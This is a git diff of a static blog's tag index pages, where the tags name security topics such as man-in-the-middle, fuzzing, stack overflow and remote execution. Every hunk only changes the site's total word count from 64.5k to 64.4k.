index 7b263e84..abd65d36 100644
--- a/tags/wifi/index.html
+++ b/tags/wifi/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/中间人/index.html b/tags/中间人/index.html
index 1b8f4a55..c702fd3d 100644
--- a/tags/中间人/index.html
+++ b/tags/中间人/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/二进制/index.html b/tags/二进制/index.html
index 15dcbb13..92ad0cfe 100644
--- a/tags/二进制/index.html
+++ b/tags/二进制/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/侧信道攻击/index.html b/tags/侧信道攻击/index.html
index c5acd312..166c48b4 100644
--- a/tags/侧信道攻击/index.html
+++ b/tags/侧信道攻击/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/取证/index.html b/tags/取证/index.html
index 0c645c1b..9ccaaa91 100644
--- a/tags/取证/index.html
+++ b/tags/取证/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/复原文件/index.html b/tags/复原文件/index.html
index f8cf3e88..29436a16 100644
--- a/tags/复原文件/index.html
+++ b/tags/复原文件/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/密码/index.html b/tags/密码/index.html
index 6d658ba2..07b9193b 100644
--- a/tags/密码/index.html
+++ b/tags/密码/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/小米/index.html b/tags/小米/index.html
index 2c5a1d0a..9290e0c8 100644
--- a/tags/小米/index.html
+++ b/tags/小米/index.html
@@ -525,7 +525,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/微信/index.html b/tags/微信/index.html
index 8e978f68..b68da571 100644
--- a/tags/微信/index.html
+++ b/tags/微信/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/拒绝服务攻击/index.html b/tags/拒绝服务攻击/index.html
index 89e25d6e..0b705124 100644
--- a/tags/拒绝服务攻击/index.html
+++ b/tags/拒绝服务攻击/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/数据库/index.html b/tags/数据库/index.html
index 058e052b..cc7421c2 100644
--- a/tags/数据库/index.html
+++ b/tags/数据库/index.html
@@ -499,7 +499,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/数据挖掘/index.html b/tags/数据挖掘/index.html
index 19971d9a..d807bbe4 100644
--- a/tags/数据挖掘/index.html
+++ b/tags/数据挖掘/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/文件格式/index.html b/tags/文件格式/index.html
index ae0491a2..5dad886d 100644
--- a/tags/文件格式/index.html
+++ b/tags/文件格式/index.html
@@ -499,7 +499,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/栈溢出/index.html b/tags/栈溢出/index.html
index 8bfab275..14aa6431 100644
--- a/tags/栈溢出/index.html
+++ b/tags/栈溢出/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/模型实现/index.html b/tags/模型实现/index.html
index af241b2e..99b5e5c6 100644
--- a/tags/模型实现/index.html
+++ b/tags/模型实现/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/模糊测试/index.html b/tags/模糊测试/index.html
index 42937801..2c0549a7 100644
--- a/tags/模糊测试/index.html
+++ b/tags/模糊测试/index.html
@@ -499,7 +499,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/漏洞/index.html b/tags/漏洞/index.html
index 9b138bc3..6ca75026 100644
--- a/tags/漏洞/index.html
+++ b/tags/漏洞/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/破解/index.html b/tags/破解/index.html
index 768dd7f5..250bb74c 100644
--- a/tags/破解/index.html
+++ b/tags/破解/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/硬件层/index.html b/tags/硬件层/index.html
index a20c40cf..00ea8cc4 100644
--- a/tags/硬件层/index.html
+++ b/tags/硬件层/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/自然语言处理/index.html b/tags/自然语言处理/index.html
index 69780bef..726d4625 100644
--- a/tags/自然语言处理/index.html
+++ b/tags/自然语言处理/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/访问控制/index.html b/tags/访问控制/index.html
index a574189b..cbd6a58b 100644
--- a/tags/访问控制/index.html
+++ b/tags/访问控制/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/路由器/index.html b/tags/路由器/index.html
index 826a9501..6fde1edc 100644
--- a/tags/路由器/index.html
+++ b/tags/路由器/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/远程执行/index.html b/tags/远程执行/index.html
index 03802f27..b0341bef 100644
--- a/tags/远程执行/index.html
+++ b/tags/远程执行/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/逆向/index.html b/tags/逆向/index.html
index 05cf6d21..225b1e00 100644
--- a/tags/逆向/index.html
+++ b/tags/逆向/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>
 
diff --git a/tags/重放攻击/index.html b/tags/重放攻击/index.html
index 1065ab49..c3c9c52b 100644
--- a/tags/重放攻击/index.html
+++ b/tags/重放攻击/index.html
@@ -473,7 +473,7 @@
       <i class="fa fa-area-chart"></i>
     </span>
     
-    <span title="Site words total count">64.5k</span>
+    <span title="Site words total count">64.4k</span>
   
 </div>